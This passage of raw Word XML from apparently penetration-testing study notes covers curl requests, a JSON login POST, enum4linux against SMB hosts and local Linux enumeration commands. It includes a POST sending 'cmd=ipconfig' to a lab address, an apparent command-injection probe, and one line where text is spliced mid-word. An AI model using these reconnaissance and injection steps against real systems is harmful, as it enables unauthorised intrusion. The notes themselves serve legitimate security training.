        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A08">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A09">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl HTTP headers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1344"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I [URL]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I http://[MACHINE_IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1344"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-I" stands for HEAD request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1344"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It instructs curl to send an HTTP HEAD request to the specified URL, instead of the default GET request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy text (ex. code) from websites and put it into local file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o [localfile] [WEBSITE_URL]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A11">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add JSON content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A12">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json'  http://192.168.50.16:5002/users/v1/login</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A14">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to add parameters and arguments to the POST request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A15">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X POST --data 'cmd=ipconfig' http://192.168.50.189:8000/archive</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the burpsuite, on the bottom, the HTTP payload would look like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="774"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd=ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_womrfu1wl49g" w:id="363"/>
      <w:bookmarkEnd w:id="363"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enum4Linux (external enumeration tool)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY IMPORTANT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Contrary to the name, Enum4Linux is a tool built for Linux Users to enumerate against WINDOWS machines (running SMB). And also Linux machines running Samba. This is not a tool to just be run randomly against Linux Machines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enum4linux </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">external enumeration tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— it's not something you run on the target; you run it agaienum4linux 192.168.210.148</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">st the target from your own machine (for example, your Kali box or attack VM).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A21">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enum4linux 192.168.210.148</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2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24">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zdj1xoj5t9xv" w:id="364"/>
      <w:bookmarkEnd w:id="364"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A26">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 18.1.2. Manual Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A28">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4595813" cy="3672500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="340" name="image324.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image324.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId872"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4595813" cy="3672500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/issue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/os-release</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A32">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Process enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy64 is better though!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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38">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sfrxhkmlmvd3" w:id="365"/>
      <w:bookmarkEnd w:id="365"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 18.1.2. Manual Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
